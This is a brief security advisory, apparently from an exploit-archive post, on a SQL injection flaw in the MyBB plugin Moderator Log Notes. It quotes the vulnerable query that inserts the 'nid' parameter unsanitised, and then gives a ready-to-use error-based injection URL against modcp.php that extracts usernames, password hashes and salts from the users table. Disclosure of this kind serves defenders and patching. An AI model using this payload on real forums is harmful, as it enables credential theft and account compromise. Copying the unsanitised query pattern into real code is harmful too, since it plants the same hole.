Introduction
============
Moderator Log Notes is a Mybb plugin that let the forum moderators add notes.
SQL Injection
=============
-----------------[/inc/plugins/modnoteslog.php]-----------------
L.217
1$db->query("DELETE FROM ".TABLE_PREFIX."modnotes WHERE nid=".$mybb->input['nid']);
-----------------[/inc/plugins/modnoteslog.php]-----------------
Proof of concept
================
Error based injection ; http://[site]/modcp.php?action=deletenote&nid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho